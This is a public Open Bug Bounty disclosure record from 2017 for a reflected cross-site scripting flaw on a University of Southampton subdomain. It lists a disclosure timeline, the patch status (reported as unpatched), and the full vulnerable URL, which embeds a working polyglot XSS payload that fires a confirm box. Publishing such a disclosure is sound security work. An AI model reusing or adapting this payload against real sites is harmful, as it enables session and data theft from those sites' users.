openbugbounty Eb OBB:260837
History: Jul 06, 2017 - 6:55 p.m.

hepmdb.soton.ac.uk XSS vulnerability

2017-07-06 18:55:00
eb
www.openbugbounty.org
8
Vulnerable URL:
https://hepmdb.soton.ac.uk/index.php?mod=/%3C!%27/*!%22/*!\%27/*\%22/*--!%3E%3C/Title/%3C/script/%3E%3CInput/Autofocus/*/Onfocus=confirm`XSSPOSED`%20//%3E%3CSvg%3E&act=showmodel&id=
Details:
Patched: No
Latest check for patch: 29.09.2017
Vulnerability type: XSS
Vulnerability status: Publicly disclosed
Alexa Rank: Unknown / Not calculated
VIP website status: No
Check hepmdb.soton.ac.uk SSL connection: Grade B
Coordinated Disclosure Timeline:
Vulnerability submitted via Open Bug Bounty: 6 July, 2017 18:55 GMT
Vulnerability existence verified and confirmed: 7 July, 2017 05:42 GMT
Generic security notifications sent to website owner: 7 July, 2017 05:42 GMT
Vulnerability details disclosed by researcher: 29 September, 2017 06:30 GMT